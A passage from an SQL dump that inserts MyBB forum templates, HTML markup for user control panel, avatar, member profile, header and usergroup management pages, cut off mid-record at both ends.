value=\"{$mybb->post_code}\" />\n<table width=\"100%\" border=\"0\" align=\"center\">\n<tr>\n{$usercpnav}\n<td valign=\"top\">\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->request_join_usergroup}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\" align=\"center\" colspan=\"2\">{$lang->join_group_moderate_note}</td>\n</tr>\n<tr>\n<td class=\"trow2\"><strong>{$lang->user_group}</strong></td>\n<td class=\"trow2\">{$usergroup[\'title\']}</td>\n</tr>\n<tr>\n<td class=\"trow1\"><strong>{$lang->join_reason}</strong></td>\n<td class=\"trow1\"><input type=\"text\" class=\"textbox\" name=\"reason\" value=\"\" size=\"50\" /></td>\n</tr>\n</table>\n<br />\n<div align=\"center\">\n<input type=\"hidden\" name=\"action\" value=\"usergroups\" />\n<input type=\"hidden\" name=\"joingroup\" value=\"{$joingroup}\" />\n<input type=\"hidden\" name=\"do\" value=\"joingroup\" />\n<input type=\"submit\" class=\"button\" value=\"{$lang->send_join_request}\" />\n</div>\n</td>\n</tr>\n</table>\n</form>\n{$footer}\n</body>\n</html>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('100', 'usercp_options_pms_from_buddys', '<tr>\n<td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"receivefrombuddy\" id=\"receivefrombuddy\" value=\"1\" {$receivefrombuddycheck} /></td>\n<td><span class=\"smalltext\"><label for=\"receivefrombuddy\">{$lang->receive_from_buddy}</label></span></td>\n</tr>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('101', 'usercp_avatar', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->change_avatar}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<table width=\"100%\" border=\"0\" align=\"center\">\n<tr>\n{$usercpnav}\n<td valign=\"top\">\n{$avatar_error}\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->change_avatar}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\" colspan=\"2\">\n<table cellspacing=\"0\" cellpadding=\"0\" width=\"100%\"><tr>\n<td>{$lang->avatar_note}{$avatarmsg}\n</td>\n{$currentavatar}\n</tr></table>\n</td>\n</tr>\n<tr>\n<td class=\"tcat\" colspan=\"2\"><strong>{$lang->local_galleries}</strong></td>\n</tr>\n<tr>\n<td class=\"trow2\"><strong>{$lang->gallery}</strong></td>\n<td class=\"trow2\">\n<form method=\"post\" action=\"usercp.php\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<input type=\"hidden\" name=\"action\" value=\"avatar\" />\n<select name=\"gallery\">\n{$galleries}\n</select>\n&nbsp;{$gobutton}\n</form>\n</td>\n</tr>\n<tr>\n<td class=\"tcat\" colspan=\"2\"><strong>{$lang->custom_avatar}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\" width=\"40%\"><strong>{$lang->avatar_upload}</strong></td>\n<td class=\"trow1\" width=\"60%\">\n<form enctype=\"multipart/form-data\" action=\"usercp.php\" method=\"post\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<input type=\"file\" name=\"avatarupload\" size=\"25\" class=\"fileupload\" />\n{$auto_resize}\n</td>\n</tr>\n<tr>\n<td class=\"trow2\" width=\"40%\"><strong>{$lang->avatar_url}</strong></td>\n<td class=\"trow2\" width=\"60%\"><input type=\"text\" class=\"textbox\" name=\"avatarurl\" size=\"45\" value=\"{$avatarurl}\" /></td>\n</tr>\n</table>\n<br />\n<div align=\"center\">\n<input type=\"hidden\" name=\"action\" value=\"do_avatar\" />\n<input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->change_avatar}\" />\n<input type=\"submit\" class=\"button\" name=\"remove\" value=\"{$lang->remove_avatar}\" />\n</div>\n</td>\n</tr>\n</table>\n</form>\n{$footer}\n</body>\n</html>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('102', 'usercp_avatar_gallery', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->change_avatar}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<table width=\"100%\" border=\"0\" align=\"center\">\n<tr>\n{$usercpnav}\n<td valign=\"top\">\n{$avatar_error}\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\"><strong>{$lang->change_avatar}</strong></td>\n</tr>\n<tr>\n<td class=\"tcat\"><strong>{$lang->local_galleries}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\" align=\"center\">\n<form method=\"post\" action=\"usercp.php\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<input type=\"hidden\" name=\"action\" value=\"avatar\" />\n<select name=\"gallery\">\n{$galleries}\n</select>\n&nbsp;{$gobutton}\n</form>\n</td>\n</tr>\n<tr>\n<td class=\"tcat\"><strong>{$lang->avatars_in_gallery}</strong></td>\n</tr>\n<tr>\n<td class=\"trow2\">\n<form method=\"post\" action=\"usercp.php\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<input type=\"hidden\" name=\"action\" value=\"do_avatar\" />\n<input type=\"hidden\" name=\"gallery\" value=\"{$gallery}\" />\n<table width=\"100%\" cellpadding=\"4\">\n{$avatarlist}\n</table>\n</td>\n</tr>\n</table>\n<br />\n<div align=\"center\">\n<input type=\"hidden\" name=\"action\" value=\"do_avatar\" />\n<input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->change_avatar}\" />\n</div>\n</td>\n</tr>\n</table>\n</form>\n{$footer}\n</body>\n</html>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('103', 'usercp_avatar_gallery_avatar', '<td width=\"20%\" align=\"center\"><label for=\"avatar-{$avatar}\"><img src=\"{$avatarpath}\" alt=\"{$avatar}\" title=\"{$avatar}\" /><br /><input type=\"radio\" class=\"radio\" name=\"avatar\" value=\"{$avatar}\" id=\"avatar-{$avatar}\" /><strong>{$avatarname}</strong></td>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('104', 'usercp_avatar_current', '<td class=\"trow1\" width=\"150\" align=\"right\"><img src=\"{$urltoavatar}\" alt=\"{$lang->avatar_mine}\" title=\"{$lang->avatar_mine}\" {$avatar_width_height} /></td>', '-2', '1603', '', '1339729416'); INSERT INTO mybb_templates VALUES('105', 'headerinclude', '<link rel=\"alternate\" type=\"application/rss+xml\" title=\"{$lang->latest_threads} (RSS 2.0)\" href=\"{$mybb->settings[\'bburl\']}/syndication.php\" />\n<link rel=\"alternate\" type=\"application/atom+xml\" title=\"{$lang->latest_threads} (Atom 1.0)\" href=\"{$mybb->settings[\'bburl\']}/syndication.php?type=atom1.0\" />\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset={$charset}\" />\n<meta http-equiv=\"Content-Script-Type\" content=\"text/javascript\" />\n<script type=\"text/javascript\" src=\"{$mybb->settings[\'bburl\']}/jscripts/prototype.js?ver=1603\"></script>\n<script type=\"text/javascript\" src=\"{$mybb->settings[\'bburl\']}/jscripts/general.js?ver=1603\"></script>\n<script type=\"text/javascript\" src=\"{$mybb->settings[\'bburl\']}/jscripts/popup_menu.js?ver=1600\"></script>\n{$stylesheets}\n<script type=\"text/javascript\">\n<!--\n var cookieDomain = \"{$mybb->settings[\'cookiedomain\']}\";\n var cookiePath = \"{$mybb->settings[\'cookiepath\']}\";\n var cookiePrefix = \"{$mybb->settings[\'cookieprefix\']}\";\n var deleteevent_confirm = \"{$lang->deleteevent_confirm}\";\n var removeattach_confirm = \"{$lang->removeattach_confirm}\";\n var loading_text = \'{$lang->ajax_loading}\';\n var saving_changes = \'{$lang->saving_changes}\';\n var use_xmlhttprequest = \"{$mybb->settings[\'use_xmlhttprequest\']}\";\n var my_post_key = \"{$mybb->post_code}\";\n var imagepath = \"{$theme[\'imgdir\']}\";\n// -->\n</script>\n{$newpmmsg}', '-2', '1603', '', '1339729416'); INSERT INTO mybb_templates VALUES('106', 'showthread_similarthreads', '<br />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" align=\"center\" colspan=\"6\"><strong>{$lang->similar_threads}</strong></td>\n</tr>\n<tr>\n<td class=\"tcat\" align=\"center\" colspan=\"2\"><span class=\"smalltext\"><strong>{$lang->thread}</strong></span></td>\n<td class=\"tcat\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->author}</strong></span></td>\n<td class=\"tcat\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->replies}</strong></span></td>\n<td class=\"tcat\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->views}</strong></span></td>\n<td class=\"tcat\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->lastpost}</strong></span></td>\n</tr>\n{$similarthreadbits}\n</table>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('107', 'nav_sep', ' / ', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('108', 'post_attachments_new', '<tr>\n<td class=\"trow1\" width=\"1\"><img src=\"{$theme[\'imgdir\']}/paperclip.gif\" alt=\"\" /></td>\n<td class=\"trow1\" style=\"white-space: nowrap\"><strong>{$lang->new_attachment}</strong> <input type=\"file\" name=\"attachment\" size=\"30\" class=\"fileupload\" /></td><td class=\"trow1\" align=\"center\">{$attach_update_options} <input type=\"submit\" class=\"button\" name=\"newattachment\" value=\"{$lang->add_attachment}\" tabindex=\"13\" />\n</td>\n</tr>', '-2', '1604', '', '1339729416'); INSERT INTO mybb_templates VALUES('109', 'nav_sep_active', ' / ', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('110', 'member_profile_online', '<a href=\"online.php\"><span class=\"online\" style=\"font-weight: bold;\">{$lang->postbit_status_online}</span></a> ({$location} @ {$location_time})', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('111', 'member_profile_offline', '<span class=\"offline\" style=\"font-weight: bold;\">{$lang->postbit_status_offline}</span>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('112', 'member_profile', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->profile}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"trow1\">\n<table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tr><td class=\"trow1\" width=\"75%\">\n<span class=\"largetext\"><strong>{$formattedname}</strong></span><br />\n<span class=\"smalltext\">\n({$usertitle})<br />\n{$groupimage}\n{$userstars}<br />\n<br />\n<strong>{$lang->registration_date}</strong> {$memregdate}<br />\n<strong>{$lang->date_of_birth}</strong> {$membday} {$membdayage}<br />\n<strong>{$lang->local_time}</strong> {$localtime}<br />\n<strong>{$lang->postbit_status}</strong> {$online_status}\n</span>\n</td><td width=\"25%\" align=\"right\" valign=\"middle\">{$avatar}</td></tr></table>\n</td>\n</tr>\n{$awaybit}\n</table>\n<br />\n<table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\">\n<tr>\n<td width=\"50%\" valign=\"top\">\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td colspan=\"2\" class=\"thead\"><strong>{$lang->users_forum_info}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\"><strong>{$lang->joined}</strong></td>\n<td class=\"trow1\">{$memregdate}</td>\n</tr>\n<tr>\n<td class=\"trow2\"><strong>{$lang->lastvisit}</strong></td>\n<td class=\"trow2\">{$memlastvisitdate} {$memlastvisittime}</td>\n</tr>\n<tr>\n<td class=\"trow1\"><strong>{$lang->total_posts}</strong></td>\n<td class=\"trow1\">{$memprofile[\'postnum\']} ({$lang->ppd_percent_total})<br /><span class=\"smalltext\">(<a href=\"search.php?action=finduserthreads&amp;uid={$uid}\">{$lang->find_threads}</a> &mdash; <a href=\"search.php?action=finduser&amp;uid={$uid}\">{$lang->find_posts}</a>)</span></td>\n</tr>\n<tr>\n<td class=\"trow2\"><strong>{$lang->timeonline}</strong></td>\n<td class=\"trow2\">{$timeonline}</td>\n</tr>\n{$referrals}\n{$reputation}\n{$warning_level}\n</table>\n<br />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td colspan=\"2\" class=\"thead\"><strong>{$lang->users_contact_details}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\" width=\"40%\"><strong>{$lang->homepage}</strong></td>\n<td class=\"trow1\">{$website}</td>\n</tr>\n{$sendemail}\n<tr>\n<td class=\"{$bgcolors[\'pm\']}\"><strong>{$lang->pm}</strong></td>\n<td class=\"{$bgcolors[\'pm\']}\"><a href=\"private.php?action=send&amp;uid={$memprofile[\'uid\']}\">{$lang->send_pm}</a></td>\n</tr>\n<tr>\n<td class=\"{$bgcolors[\'icq\']}\"><strong>{$lang->icq_number}</strong></td>\n<td class=\"{$bgcolors[\'icq\']}\">{$memprofile[\'icq\']}</td>\n</tr>\n<tr>\n<td class=\"{$bgcolors[\'aim\']}\"><strong>{$lang->aim_screenname}</strong></td>\n<td class=\"{$bgcolors[\'aim\']}\"><a href=\"javascript:;\" onclick=\"MyBB.popupWindow(\'misc.php?action=imcenter&amp;imtype=aim&amp;uid={$uid}\', \'imcenter\', 450, 300);\">{$memprofile[\'aim\']}</a></td>\n</tr>\n<tr>\n<td class=\"{$bgcolors[\'yahoo\']}\"><strong>{$lang->yahoo_id}</strong></td>\n<td class=\"{$bgcolors[\'yahoo\']}\"><a href=\"javascript:;\" onclick=\"MyBB.popupWindow(\'misc.php?action=imcenter&amp;imtype=yahoo&amp;uid={$uid}\', \'imcenter\', 450, 300);\">{$memprofile[\'yahoo\']}</a></td>\n</tr>\n<tr>\n<td class=\"{$bgcolors[\'msn\']}\"><strong>{$lang->msn}</strong></td>\n<td class=\"{$bgcolors[\'msn\']}\"><a href=\"javascript:;\" onclick=\"MyBB.popupWindow(\'misc.php?action=imcenter&amp;imtype=msn&amp;uid={$uid}\', \'imcenter\', 450, 300);\">{$memprofile[\'msn\']}</a></td>\n</tr>\n</table>\n</td>\n<td><img src=\"{$theme[\'imgdir\']}/pixel.gif\" height=\"1\" width=\"8\" alt=\"\"/></td>\n<td width=\"50%\" valign=\"top\">\n{$profilefields}\n{$signature}\n{$modoptions}\n{$adminoptions}\n{$buddy_options}\n</td>\n</tr>\n</table>\n{$footer}\n</body>\n</html>', '-2', '1602', '', '1339729416'); INSERT INTO mybb_templates VALUES('113', 'member_profile_adminoptions', '\n<br /><table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" width=\"100%\" class=\"tborder\">\n<tr>\n<td colspan=\"2\" class=\"thead\"><strong>{$lang->admin_options}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\">\n<ul>\n<li><a href=\"{$mybb->settings[\'bburl\']}/{$config[\'admin_dir\']}/index.php?module=user-users&amp;action=edit&amp;uid={$uid}\">{$lang->admin_edit_in_acp}</a></li>\n<li><a href=\"{$mybb->settings[\'bburl\']}/{$config[\'admin_dir\']}/index.php?module=user-banning&amp;uid={$uid}\">{$lang->admin_ban_in_acp}</a></li>\n</ul>\n</td>\n</tr>\n</table>', '-2', '1605', '', '1339729416'); INSERT INTO mybb_templates VALUES('114', 'member_profile_modoptions', '\n<br /><table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" width=\"100%\" class=\"tborder\">\n<tr>\n<td colspan=\"2\" class=\"thead\"><strong>{$lang->mod_options}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\">\n<ul>\n<li><a href=\"{$mybb->settings[\'bburl\']}/modcp.php?action=editprofile&amp;uid={$uid}\">{$lang->edit_in_mcp}</a></li>\n<li><a href=\"{$mybb->settings[\'bburl\']}/modcp.php?action=banuser&amp;uid={$uid}\">{$lang->ban_in_mcp}</a></li>\n</ul>\n</td>\n</tr>\n<tr>\n<td class=\"trow2\">\n{$memprofile[\'usernotes\']}<br />\n<a href=\"{$mybb->settings[\'bburl\']}/modcp.php?action=editprofile&amp;uid={$uid}\">{$lang->edit_usernotes}</a>\n</td>\n</tr>\n</table>\n', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('115', 'header_welcomeblock_guest', '<script type=\"text/javascript\">\n<!--\n lang.username = \"{$login_username}\";\n lang.password = \"{$lang->login_password}\";\n lang.login = \"{$lang->login}\";\n lang.lost_password = \" &mdash; <a href=\\\"{$mybb->settings[\'bburl\']}/member.php?action=lostpw\\\">{$lang->lost_password}<\\/a>\";\n lang.register_url = \" &mdash; <a href=\\\"{$mybb->settings[\'bburl\']}/member.php?action=register\\\">{$lang->welcome_register}<\\/a>\";\n lang.remember_me = \"{$lang->remember_me}\";\n// -->\n</script>\n<span style=\"float: right;\">{$lang->welcome_current_time}</span>\n <span id=\"quick_login\">{$lang->welcome_guest} (<a href=\"{$mybb->settings[\'bburl\']}/member.php?action=login\" onclick=\"MyBB.quickLogin(); return false;\">{$lang->welcome_login}</a> &mdash; <a href=\"{$mybb->settings[\'bburl\']}/member.php?action=register\">{$lang->welcome_register}</a>)</span>', '-2', '1607', '', '1339729416'); INSERT INTO mybb_templates VALUES('116', 'header', ' <div id=\"container\">\n <a name=\"top\" id=\"top\"></a>\n <div id=\"header\">\n <div class=\"logo\"><a href=\"{$mybb->settings[\'bburl\']}/index.php\"><img src=\"{$theme[\'logo\']}\" alt=\"{$mybb->settings[\'bbname\']}\" title=\"{$mybb->settings[\'bbname\']}\" /></a></div>\n <div class=\"menu\">\n <ul>\n <li><a href=\"{$mybb->settings[\'bburl\']}/search.php\"><img src=\"{$theme[\'imgdir\']}/toplinks/search.gif\" alt=\"\" title=\"\" />{$lang->toplinks_search}</a></li>\n <li><a href=\"{$mybb->settings[\'bburl\']}/memberlist.php\"><img src=\"{$theme[\'imgdir\']}/toplinks/memberlist.gif\" alt=\"\" title=\"\" />{$lang->toplinks_memberlist}</a></li>\n <li><a href=\"{$mybb->settings[\'bburl\']}/calendar.php\"><img src=\"{$theme[\'imgdir\']}/toplinks/calendar.gif\" alt=\"\" title=\"\" />{$lang->toplinks_calendar}</a></li>\n <li><a href=\"{$mybb->settings[\'bburl\']}/misc.php?action=help\"><img src=\"{$theme[\'imgdir\']}/toplinks/help.gif\" alt=\"\" title=\"\" />{$lang->toplinks_help}</a></li>\n </ul>\n </div>\n <hr class=\"hidden\" />\n <div id=\"panel\">\n {$welcomeblock}\n </div>\n </div>\n <hr class=\"hidden\" />\n <br class=\"clear\" />\n <div id=\"content\">\n {$pm_notice}\n {$bannedwarning}\n {$bbclosedwarning}\n {$unreadreports}\n {$pending_joinrequests}\n <navigation>\n <br />\n', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('117', 'usercp_usergroups_leader_usergroup', '<tr>\n<td class=\"{$trow}\"><strong>{$usergroup[\'title\']}</strong></td>\n<td class=\"{$trow}\" align=\"center\">{$usergroup[\'users\']} {$memberlistlink}</td>\n<td class=\"{$trow}\" align=\"center\">{$usergroup[\'joinrequests\']} {$moderaterequestslink}</td>\n</tr>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('118', 'usercp_usergroups_leader', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"3\"><strong>{$lang->usergroups_leader}</strong></td>\n</tr>\n<tr>\n<td class=\"tcat\" width=\"36%\"><strong><span class=\"smalltext\">{$lang->usergroup}</span></strong></td>\n<td class=\"tcat\" align=\"center\" width=\"32%\"><strong><span class=\"smalltext\">{$lang->usergroup_members}</span></strong></td>\n<td class=\"tcat\" align=\"center\" width=\"32%\"><strong><span class=\"smalltext\">{$lang->join_requests}</span></strong></td>\n</tr>\n{$groupsledlist}\n</table>\n<br />', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('119', 'usercp_usergroups_joinable', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"3\"><strong>{$lang->usergroups_joinable}</strong></td>\n</tr>\n<tr>\n<td class=\"tcat\" width=\"36%\"><strong><span class=\"smalltext\">{$lang->usergroup}</span></strong></td>\n<td class=\"tcat\" align=\"center\" width=\"32%\"><strong><span class=\"smalltext\">{$lang->join_conditions}</span></strong></td>\n<td class=\"tcat\" align=\"center\" width=\"32%\"><strong><span class=\"smalltext\">{$lang->join_group}</span></strong></td>\n</tr>\n{$joinablegrouplist}\n</table>\n<br />', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('120', 'usercp_usergroups_joinable_usergroup', '<tr>\n<td class=\"{$trow}\"><strong>{$usergroup[\'title\']}</strong>{$description}</td>\n<td class=\"{$trow}\"><span class=\"smalltext\">{$conditions}</span><br /><span class=\"smalltext\">{$usergroupleaders}</span></td>\n<td class=\"{$trow}\" align=\"center\">{$joinlink}</td>\n</tr>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('121', 'usercp_usergroups_memberof_usergroup', '<tr>\n<td class=\"{$trow}\"><strong>{$usergroup[\'title\']}</strong> {$displaycode}{$description}</td>\n<td class=\"{$trow}\" align=\"center\">{$usergroup[\'usertitle\']}</td>\n<td class=\"{$trow}\">{$leavelink}</td>\n</tr>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('122', 'usercp_usergroups', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->group_memberships}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<table width=\"100%\" border=\"0\" align=\"center\">\n<tr>\n{$usercpnav}\n<td valign=\"top\">\n{$leadinggroups}\n{$joinablegroups}\n{$membergroups}\n</td>\n</tr>\n</table>\n{$footer}\n</body>\n</html>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('123', 'usercp_usergroups_memberof', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"3\"><strong>{$lang->usergroups_memberof}</strong></td>\n</tr>\n<tr>\n<td class=\"tcat\" width=\"35%\"><strong><span class=\"smalltext\">{$lang->usergroup}</span></strong></td>\n<td class=\"tcat\" align=\"center\" width=\"32%\"><strong><span class=\"smalltext\">{$lang->usertitle}</span></strong></td>\n<td class=\"tcat\" align=\"center\" width=\"32%\"><strong><span class=\"smalltext\">{$lang->usergroup_leave}</span></strong></td>\n</tr>\n{$memberoflist}\n</table>\n<br />', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('124', 'managegroup', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->members_of}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n{$joinrequests}\n<p>{$usergrouptype}</p>\n{$group_leaders}\n<form method=\"post\" action=\"managegroup.php\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<input type=\"hidden\" name=\"action\" value=\"do_manageusers\" />\n<input type=\"hidden\" name=\"gid\" value=\"{$gid}\" />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"6\"><strong>{$lang->members_of}</strong></td>\n</tr>\n<tr>\n<td class=\"tcat\" width=\"40%\"><span class=\"smalltext\"><strong>{$lang->user_name}</strong></span></td>\n<td class=\"tcat\" colspan=\"2\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->contact}</strong></span></td>\n<td class=\"tcat\" align=\"center\" width=\"15%\"><span class=\"smalltext\"><strong>{$lang->reg_date}</strong></span></td>\n<td class=\"tcat\" align=\"center\" width=\"15%\"><span class=\"smalltext\"><strong>{$lang->post_count}</strong></span></td>\n<td class=\"tcat\" width=\"1\">&nbsp;</td>\n</tr>\n{$users}\n</table>\n<br />\n<div align=\"center\">{$remove_users}</div>\n</form>\n{$add_user}\n\n{$footer}\n</body>\n</html>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('125', 'managegroup_removeusers', '<input type=\"submit\" class=\"button\" value=\"{$lang->remove_selected}\" />', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('126', 'managegroup_adduser', '<br />\n<form method=\"post\" action=\"managegroup.php\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<input type=\"hidden\" name=\"action\" value=\"do_add\" />\n<input type=\"hidden\" name=\"gid\" value=\"{$gid}\" />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"6\"><strong>{$lang->add_member}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\">{$lang->username}</td>\n<td class=\"trow1\"><input type=\"text\" class=\"textbox\" name=\"username\" size=\"40\" maxlength=\"{$mybb->settings[\'maxnamelength\']}\" /></td>\n</tr>\n</table>\n<br />\n<div align=\"center\"><input type=\"submit\" class=\"button\" value=\"{$lang->add_member_submit}\" /></div>\n</form>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('127', 'managegroup_no_users', '<tr>\n<td class=\"trow1\" colspan=\"6\">{$lang->no_users}</td>\n</tr>', '-2', '1607', '', '1339729416'); INSERT INTO mybb_templates VALUES('128', 'managegroup_user', '<tr>\n<td class=\"{$altbg}\">{$user[\'profilelink\']} {$leader}</td>\n<td class=\"{$altbg}\" align=\"center\" width=\"100\">{$email}</td>\n<td class=\"{$altbg}\" align=\"center\" width=\"100\">{$sendpm}</td>\n<td class=\"{$altbg}\" align=\"center\">{$regdate}</td>\n<td class=\"{$altbg}\" align=\"center\">{$user[\'postnum\']}</td>\n<td class=\"{$altbg}\" align=\"center\">{$checkbox}</td>\n</tr>\n', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('129', 'managegroup_user_checkbox', '<input type=\"checkbox\" class=\"checkbox\" name=\"removeuser[{$user[\'uid\']}]\" value=\"{$user[\'uid\']}\" />', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('130', 'managegroup_requestnote', '<p>\n<strong><a href=\"managegroup.php?action=joinrequests&amp;gid={$gid}\">{$lang->pending_requests}</a></strong><br />\n{$lang->num_requests_pending}\n</p>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('131', 'managegroup_joinrequests', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->join_requests}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n{$joinrequests}\n<form method=\"post\" action=\"managegroup.php\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<input type=\"hidden\" name=\"action\" value=\"do_joinrequests\" />\n<input type=\"hidden\" name=\"gid\" value=\"{$gid}\" />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"6\"><strong>{$lang->join_requests}</strong></td>\n</tr>\n<tr>\n<td class=\"tcat\" width=\"30%\"><strong>{$lang->user_name}</strong></td>\n<td class=\"tcat\" align=\"center\" width=\"40%\"><strong>{$lang->reason}</strong></td>\n<td class=\"tcat\" align=\"center\" width=\"10%\"><strong>{$lang->accept}</strong></td>\n<td class=\"tcat\" align=\"center\" width=\"10%\"><strong>{$lang->ignore}</strong></td>\n<td class=\"tcat\" align=\"center\" width=\"10%\"><strong>{$lang->decline}</strong></td>\n</tr>\n{$users}\n</table>\n<br />\n<div align=\"center\"><input type=\"submit\" class=\"button\" value=\"{$lang->action_requests}\" /></div>\n</form>\n{$footer}\n</body>\n</html>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('132', 'managegroup_joinrequests_request', '<tr>\n<td class=\"{$altbg}\">{$user[\'profilelink\']}</td>\n<td class=\"{$altbg}\" align=\"center\">{$user[\'reason\']}</td>\n<td class=\"{$altbg}\" align=\"center\"><input type=\"radio\" class=\"radio\" name=\"request[{$user[\'uid\']}]\" value=\"accept\" /></td>\n<td class=\"{$altbg}\" align=\"center\"><input type=\"radio\" class=\"radio\" name=\"request[{$user[\'uid\']}]\" value=\"ignore\" checked=\"checked\" /></td>\n<td class=\"{$altbg}\" align=\"center\"><input type=\"radio\" class=\"radio\" name=\"request[{$user[\'uid\']}]\" value=\"decline\" /></td>\n</tr>\n', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('133', 'managegroup_leaders', '<p>{$lang->group_leaders}: {$leaders}</p>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('134', 'managegroup_leaders_bit', '{$leader_profile_link}{$comma}', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('135', 